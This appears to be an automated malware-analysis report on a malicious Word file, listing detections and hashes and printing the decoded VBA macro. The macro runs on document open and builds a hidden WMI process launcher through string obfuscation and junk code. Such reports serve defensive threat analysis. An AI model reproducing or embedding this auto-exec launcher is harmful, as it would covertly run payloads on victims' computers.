Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 592a0ef2e88f78e3…

MALICIOUS

Office (OOXML)

Size: 136.6 KB
Created: 2020-01-24 22:43:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2021-02-19
MD5: 81d4ba4c3543eb5138999725b15ff867
SHA-1: 19fe7c7c117cd23e33eaa55accf366c917e4fdb5
SHA-256: 592a0ef2e88f78e312bb01885b175903af622c96256d39f2186982f551c14c7d
Risk score: 230

Heuristics (6)

  • ClamAV: Doc.Downloader.Generic-7561169-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Generic-7561169-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Rjpbcrutd = GetObject(Weasnwdnbgv)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13235 bytes
SHA-256: f9b6a17641c88efa7890b50683f123122dbc10ce9d97981bc88a139449efe9ba
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Zaicbhqx"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()





Call Wvuwgsgzf








End Sub

Attribute VB_Name = "Allaphlvlegir"
Attribute VB_Base = "0{E96AE64B-8751-4BCF-88CC-186FDE30B221}{E2C24FB5-81D4-4B1D-98DB-34552D6A2C45}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Jmrbvjcicfqw"
Attribute VB_Base = "0{3C519328-989A-4463-9CC1-C8664B6740AC}{245B0657-254C-47F3-BE21-CB26A6E927DF}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Gcgfgthcvu()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Wjxlvoebno"
Attribute VB_Base = "0{93B66BE5-79BE-4876-AC7C-8F8D24EDAFDE}{E7C194F9-9CEA-4090-B312-302606DAE5EC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Miiierqdxqdu()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Zrnhqxiim"
Attribute VB_Base = "0{E0CCE00E-AA48-4FD2-AB70-153AE5C1A02A}{90396BBD-9A62-4CF1-A549-5DDE2FA93B03}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Qjcrewrfnt()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Zxedppffdx"
Attribute VB_Base = "0{FBDA25B8-1FA0-437C-8AF5-1BDB1FF27507}{791B7A14-A82E-4D4D-B913-BBDD25D9C11D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Nnfxzkdwpxo()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Ltumoanbfoj"
Attribute VB_Base = "0{C1931648-5331-4420-ACF1-F24599CDB457}{525712C8-37E3-473D-9DE8-D34AC962B0AC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Stgnhsvneqqu()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Pbvcjwpd"
Attribute VB_Base = "0{80CFD329-ED4C-4FE4-96DF-AEE5A2B43D60}{6BA979E3-35F6-4ADB-AF12-4088CEF6AF92}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Towanhzwkg()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Pcqvmahcds"
Attribute VB_Base = "0{47F96D57-D96E-4537-BF9D-4CC01718A002}{57A0B260-2DD2-45B7-AE3F-917712D7BCD4}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Xzkmaqdoxvtsw()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Xrujalfm"
Attribute VB_Base = "0{14DEB8BD-DAF0-4A43-AD90-FF88F50C68D7}{7A0D4784-C3F6-46C2-BA99-107744332C2B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Nkowthbhzd()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Mvucdmuiyzrak"
Attribute VB_Base = "0{83C07A3A-7649-4E66-B3BD-36E92CC70CBA}{DFC08DDD-6203-4176-898B-1472516D67D1}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Ihlrmqamfp()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Nslwrlze"
Attribute VB_Base = "0{AF40F193-2AFA-47BF-9329-F845B40EEC6D}{DEDDE52C-69E1-4A72-9B52-543291B4352A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Yhtslnosomj()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Znlbhmjpnmjg"
Attribute VB_Base = "0{F0450B17-CD00-4C36-B776-E827FEBDAE6F}{241FD615-A313-45E2-AF9C-4EAACA56A9E0}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Caokflujey()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Mxnafupal"
Attribute VB_Base = "0{3DDD2F6C-0C24-4D3F-A05A-5E6F7A259D35}{C7F168E0-259C-40D8-AC6A-188F53B1F767}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kssozlvkl()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Lszbdnxq"
Attribute VB_Base = "0{7F3F702A-BCB6-41F8-A4B9-A5582903CF50}{9E774E1B-54D2-4400-896A-F6136D3BCBCC}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Hbzmcmgoqq()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Tesmwvyjoikm"
Attribute VB_Base = "0{B32839A1-61DD-4F4A-9572-3FCF7B5C00DF}{A4382E28-F46F-4E97-BE52-F8EAEFE030E9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Bdqccuatdqtc()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Ovuezryujqqcs"
Attribute VB_Base = "0{CCD4B723-0230-4AE6-B15D-0578D97D90C4}{7387A40B-285F-4D5C-9FCC-8B09D3C45D6D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Yrmahkcxongta()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Tuyzvsnf"
Attribute VB_Base = "0{79238E24-5744-44C2-B73A-11781B0681EF}{E426A2A1-F43F-4898-9697-41D5A4691F3D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Vhualacauezg()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Olxgrsyxtix"
Attribute VB_Base = "0{FF3130CC-2D84-4651-8920-0F8E8F485A9B}{97EE7547-BF19-46B3-A3C5-C62D9BDADBD8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Tdfllagl()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Xcnesfxbm"
Attribute VB_Base = "0{110322CC-C0BB-4CA1-9CE0-4BB91C6CD5D7}{A721B7E2-2EB9-4A41-803F-F842F281439C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Kjugouvxom()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Wixpsngveld"
Attribute VB_Base = "0{6C1B038D-CC74-40F2-AC9F-5EE88F280DBE}{B06A8166-CC45-435B-BF05-ECF0DB918791}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Dofsvgle()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Tkexgknpw"
Attribute VB_Base = "0{907126C4-6DAC-4145-B351-4D961A2C4D07}{D99BD503-26DF-4247-9A22-BE00AF24B19A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Qvvqeofwezg()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Lfqfsgql"
Attribute VB_Base = "0{D3F5C1A2-D13B-43B8-B8AE-45E788758A0B}{7C0F5369-0E81-4A05-928E-080221EABD87}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Denqalqw()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Qmskcqsgh"
Attribute VB_Base = "0{43E39219-31E0-4473-8097-FB6BC16E113B}{B6CEBA73-6F96-483A-9445-3845750B1C09}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Npbmauhwqe()
Debug.Print "Pizdec"
End Sub

Attribute VB_Name = "Bjbxamosjet"
Function Gdgdwwjopp()
   c = Pjrzmbvp
b = "{trashwords1}"
k = 180
o = Saywvrah
n = 189
L = 721
M = 783
h = (Kwnpqyizunmj)
s = "{trashwords1}"
o = 86
h = ("{trashwords1}")
Lchztelbwq = ChrW(owdsd + wdKeyP + kwm)
   c = Fcnfecokt
b = "{trashwords1}"
k = 647
o = Htciqpmlkkd
n = 158
L = 661
M = 374
h = (Ikbsnwol)
s = "{trashwords1}"
o = 67
h = ("{trashwords1}")
Gzimsbrgyoyt = Lchztelbwq + Allaphlvlegir.Fsqmpuaursf + Allaphlvlegir.Iqtkwkjhfht
   c = Ucwofbciv
b = "{trashwords1}"
k = 198
o = Hwdozxulfiysb
n = 136
L = 922
M = 506
h = (Smqdiaifvkjdk)
s = "{trashwords1}"
o = 752
h = ("{trashwords1}")
omwn = Allaphlvlegir.Uohjajjx.ControlTipText
Jbatyaksujc = Split(Gzimsbrgyoyt + CVar(StrReverse(omwn)), "i_^^najks===///")
   c = Heaigjoeqe
b = "{trashwords1}"
k = 15
o = Chpytptyvo
n = 468
L = 936
M = 619
h = (Jowvnppcifte)
s = "{trashwords1}"
o = 602
h = ("{trashwords1}")
Gdgdwwjopp = Join(Jbatyaksujc, "")
   c = Wdtkamvzlng
b = "{trashwords1}"
k = 394
o = Awbdosqb
n = 627
L = 811
M = 713
h = (Irvvuxgis)
s = "{trashwords1}"
o = 374
h = ("{trashwords1}")
End Function
Function Wvuwgsgzf()
mdnuuw = "i_^^najks===///i_^^najks===///ii_^^najks===///ni_^^najks===///mi_^^najks===///gi_^^najks===///mti_^^najks===///" + ChrW(Int(wdKeyS)) + ":i_^^najks===///i_^^najks===///wii_^^najks===///i_^^najks===///n3i_^^najks===///2_i_^^najks===///i_^^najks===///" + Allaphlvlegir.Tuhihkvwri + "i_^^najks===///roci_^^najks===///i_^^najks===///esi_^^najks===///si_^^najks===///i_^^najks===///"
   c = Dquhzjfx
b = "{trashwords1}"
k = 768
o = Ghsvkzjee
n = 793
L = 138
M = 408
h = (Qucyzazc)
s = "{trashwords1}"
o = 933
h = ("{trashwords1}")
ienloqw = "i_^^najks===///"
   c = Hwglwqivan
b = "{trashwords1}"
k = 900
o = Hovwrfdt
n = 514
L = 560
M = 843
h = (Vgwqlvooy)
s = "{trashwords1}"
o = 398
h = ("{trashwords1}")
Ynbpmscmnlgd = Split("i_^^najks===///wi_^^najks===///i_^^najks===///i_^^najks===///" + mdnuuw + mmnnnsde, ienloqw)
   c = Gpwbaqbvqr
b = "{trashwords1}"
k = 351
o = Hdbijynego
n = 332
L = 833
M = 472
h = (Eojskefnjl)
s = "{trashwords1}"
o = 64
h = ("{trashwords1}")
Weasnwdnbgv = Join(Ynbpmscmnlgd, "")
   c = Nddehhyxasf
b = "{trashwords1}"
k = 802
o = Dsbfmjamqjds
n = 349
L = 169
M = 119
h = (Mdodmjbg)
s = "{trashwords1}"
o = 215
h = ("{trashwords1}")
Set Rjpbcrutd = GetObject(Weasnwdnbgv)
   c = Owiikexatujv
b = "{trashwords1}"
k = 369
o = Lihhdihk
n = 946
L = 220
M = 740
h = (Pdjwaqlbs)
s = "{trashwords1}"
o = 304
h = ("{trashwords1}")
Csrjoezk = Allaphlvlegir.Vjbuoraa.Tag
Sjegmjcx = Weasnwdnbgv + ChrW(mmsnu + wdKeyS) + Allaphlvlegir.Hsqfwyivvans.Tag + Csrjoezk
   c = Jqxrbufpxz
b = "{trashwords1}"
k = 233
o = Wkybvzdbdfcq
n = 86
L = 551
M = 295
h = (Avoievngfk)
s = "{trashwords1}"
o = 596
h = ("{trashwords1}")
Qytjpacecpfs = Sjegmjcx + Allaphlvlegir.Tuhihkvwri
   c = Mppterwgm
b = "{trashwords1}"
k = 699
o = Ohwnhyjof
n = 675
L = 228
M = 566
h = (Aixuxolgygeig)
s = "{trashwords1}"
o = 196
h = ("{trashwords1}")
Set Wvuwgsgzf = GetObject(Qytjpacecpfs)
   c = Rdsqeozv
b = "{trashwords1}"
k = 390
o = Iqystkxei
n = 990
L = 693
M = 387
h = (Nolhugpkv)
s = "{trashwords1}"
o = 417
h = ("{trashwords1}")
Wvuwgsgzf. _
SHoWwiNDow! = False
   c = Xkamhkvzbetu
b = "{trashwords1}"
k = 834
o = Hhpmgpfxyxe
n = 27
L = 57
M = 545
h = (Mjfndmvjfgb)
s = "{trashwords1}"
o = 472
h = ("{trashwords1}")
Do While Rjpbcrutd. _
Create(mxuws & Gdgdwwjopp, Bujzzztgtjmes, Wvuwgsgzf, Zroztgah, Qakbloopnmaa, Gmizdaegf, Jrrjrbmwhjyje, Xoenzyljsgxb, Njvoecxwfw, Eyvhcdricpc)
Loop
   c = Ujxteavtuzz
b = "{trashwords1}"
k = 246
o = Fymterlou
n = 819
L = 872
M = 36
h = (Efgosmmiz)
s = "{trashwords1}"
o = 213
h = ("{trashwords1}")
End Function
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 114688 bytes
SHA-256: f64d2b6a55863edece62dbe48285851d53c57ee71a4216958a8821de94965691
Detection
ClamAV: Doc.Downloader.Generic-7561169-0
Obfuscation or payload: unlikely